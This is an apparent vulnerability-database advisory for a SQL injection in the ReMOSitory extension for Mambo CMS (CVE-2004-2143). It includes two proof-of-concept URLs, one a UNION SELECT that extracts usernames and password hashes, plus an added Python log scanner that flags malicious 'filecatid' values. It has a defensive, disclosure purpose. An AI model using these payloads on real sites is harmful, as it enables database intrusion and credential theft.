ReMOSitory Server Remote SQL Injection Vulnerability


Vulnerability ID 1108178 Vulnerability type Input validation
Published 2004-09-18 Updated 2005-10-20
CVE ID CVE-2004-2143
CNNVD-ID CNNVD-200412-1187
Platform PHP CVSS score 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/24613
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1187
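|Vulnerability Details
Mambo Open Source is an open-source web content management system (CMS) based on PHP and MySQL. It supports search engine optimization, template/theme downloads, traffic statistics and more. ReMOSitory Server is an extension component for Mambo Open Source. ReMOSitory Server does not correctly handle user-supplied URL parameters, so a remote attacker can exploit this vulnerability to perform SQL injection and may obtain sensitive database information. The core problem is that data submitted in the 'filecatid' parameter is not sufficiently filtered: a user who submits data containing malicious SQL commands as the value of this parameter can change the logic of the original SQL query, obtain sensitive information, or possibly modify data in the database.
|Exploit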
source: http://www.securityfocus.com/bid/11219/info

It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input.

Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.

http://www.example.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
http://www.example.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*
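
A defensive check for the request pattern described above, as an added example that is not part of the original advisory: it scans web-server access log lines for `com_remository` requests whose decoded `filecatid` is not a plain integer. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A legitimate category id is assumed to be a short decimal integer.
INT_RE = re.compile(r"[0-9]{1,10}")

def suspicious_filecatid(log_line):
    """Return the decoded filecatid value if the request targets
    com_remository with a non-integer filecatid, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # parse_qs percent-decodes, so %20 and '+' are spaces before the check.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_remository" not in params.get("option", []):
        return None
    # Check every occurrence: a repeated parameter must not hide a bad value.
    for value in params.get("filecatid", []):
        if not INT_RE.fullmatch(value):
            return value
    return None

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Sep/2004:10:00:01 +0000] "GET /index.php?option=com_remository&Itemid=27&func=fileinfo&filecatid=499 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Sep/2004:10:00:07 +0000] "GET /index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0/* HTTP/1.1" 200 812',
    '192.0.2.10 - - [18/Sep/2004:10:00:09 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 9001',
]

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_filecatid(line)
        if value is not None:
            hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-integer filecatid {value!r}")
```

The same integer-only rule is the server-side fix for this class of bug: cast or validate `filecatid` as an integer before it reaches the query.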
|References

Source: www.mamboportal.com
Link: http://www.mamboportal.com/content/view/1615/
Source: SECTRACK
Name: 1011356
Link: http://securitytracker.com/id?1011356
Source: SECUNIA
Name: 12597
Link: http://secunia.com/advisories/12597/
Source: XF
Name: remository-filecatid-sql-injection(17441)
Link: http://xforce.iss.net/xforce/xfdb/17441
Source: BID
Name: 11219
Link: http://www.securityfocus.com/bid/11219
Source: OSVDB
Name: 10040
Link: http://www.osvdb.org/10040
Source: BUGTRAQ
Name: 20040919 Re: Mambo Portal lasted version 4.5.1 (1.09) and lower vesion: SQL injection Vulnerability.
Link: http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html
Source: BUGTRAQ
Name: 20040917 Mambo Portal lasted version 4.5.1 (1.09) and lower vesion: SQL injection Vulnerability.
Link: http://archives.neohapsis.com/archives/bugtraq/2004-09/0215.html
Source: NSFOCUS
Name: 6908
Link: http://www.nsfocus.net/vulndb/6908
